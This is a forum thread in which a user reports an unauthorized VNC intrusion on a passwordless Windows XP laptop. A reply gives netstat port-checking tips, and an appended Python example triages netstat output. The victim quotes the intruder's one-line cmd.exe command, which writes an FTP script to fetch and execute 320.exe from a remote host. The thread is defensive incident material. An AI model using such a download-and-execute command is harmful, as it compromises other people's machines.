
Unauthorized VNC access; Tried to execute script


    New Member

  • Member
  • 1 posts

I am running on a PentiumM, 1.8G laptop, WinXP 5.1, SP2 with all updates. I have a router/firewall, and opened up the VNC ports for someone to view my computer. Unfortunately, I removed the password to make it easier for our customer. Within 10 minutes after our session and before I closed up the port, I see strange activity on my computer and realize someone else jumped on. They opened up the start>run and tried to execute the following line:

cmd.exe /c del i&echo open 17313 > i&echo user 1 1 >> i &echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit

Whois results in OrgName: Conway Corporation
Traceroute dhcp37-239.cable.conwaycorp.net.

I think I closed down the dos window and port in time, but am not sure.

The above line looks to be getting my pc to download a file from them and then execute it. I am guessing bad things would then happen.

So, can someone let me know the following:

1. What does this do?
2. Should I report this to anyone? Conway Corp?

To me, this is a big deal considering they detected my open port within 15 minutes so they are probing vnc ports and given what I could have lost depending on their next actions. I can get only so much satisfaction by pinging their computer...

And yes, I know the correct answer is to not open up VNC ever again without a password. Lesson learned! To be safe, I backed up my laptop and am now running through your spyware/virus programs to clean up anything.

Thanks for any assistance. I appreciate all of the help from this site and use it often.
  • 0





  • Member
  • 80 posts
Try running this test

Finding out what Ports are open

To find out what ports are open/exposed, do the following:

Start >Run >type "cmd" {enter}
At the command line type "netstat -a" {enter}

The list displayed shows "Listening ports" and established "Who is on the other end" connections to your computer.

This is a list of common Trojan/Backdoor Port numbers

Who is listening? Use this syntax: netstat -an |find /i "listening"
Save who is listening to a text file: netstat -an |find /i "listening" > c:\openports.txt
Who is established? Use this syntax: netstat -an |find /i "established"

Note: In Windows XP, you can type NETSTAT -O to get a list of the owning process IDs associated with each connection: netstat -ao |find /i "listening"

  • 0
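An added example, not part of either post above: a small triage script for saved `netstat -ano` output that flags a VNC listener reachable from the network, a live VNC session, and an outbound FTP connection like the one the pasted command would have opened. The sample output is constructed, the function names are hypothetical, and the port numbers are the usual defaults (5900/5800 for VNC, 21 for FTP), which the thread itself does not state.

```python
import re

# Assumed defaults: 5900 = VNC (RFB), 5800 = VNC Java viewer, 21 = FTP control.
VNC_PORTS = {5800, 5900}
FTP_PORT = 21

# Constructed sample of `netstat -ano` output (documentation-range addresses).
SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       1840
  TCP    127.0.0.1:1029         0.0.0.0:0              LISTENING       2312
  TCP    192.168.1.20:5900      203.0.113.7:4411       ESTABLISHED     1840
  TCP    192.168.1.20:1187      198.51.100.9:21        ESTABLISHED     3004
  UDP    0.0.0.0:445            *:*                                    4
"""

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$")

def parse(text):
    """Return TCP rows as dicts; header, UDP and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            laddr, lport, raddr, rport, state, pid = m.groups()
            rows.append({"laddr": laddr, "lport": int(lport), "raddr": raddr,
                         "rport": int(rport), "state": state, "pid": int(pid)})
    return rows

def triage(rows):
    """Flag the connections that matter for the incident in this thread."""
    findings = []
    for r in rows:
        listening = r["state"] == "LISTENING"
        established = r["state"] == "ESTABLISHED"
        if listening and r["lport"] in VNC_PORTS and not r["laddr"].startswith("127."):
            findings.append(("vnc-exposed", r["lport"], r["pid"]))
        elif established and r["lport"] in VNC_PORTS:
            findings.append(("vnc-session", r["raddr"], r["pid"]))
        elif established and r["rport"] == FTP_PORT:
            findings.append(("outbound-ftp", r["raddr"], r["pid"]))
    return findings

if __name__ == "__main__":
    for finding in triage(parse(SAMPLE)):
        print(finding)
```

The PID in each finding can be matched against the process list to see which program owns the socket.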
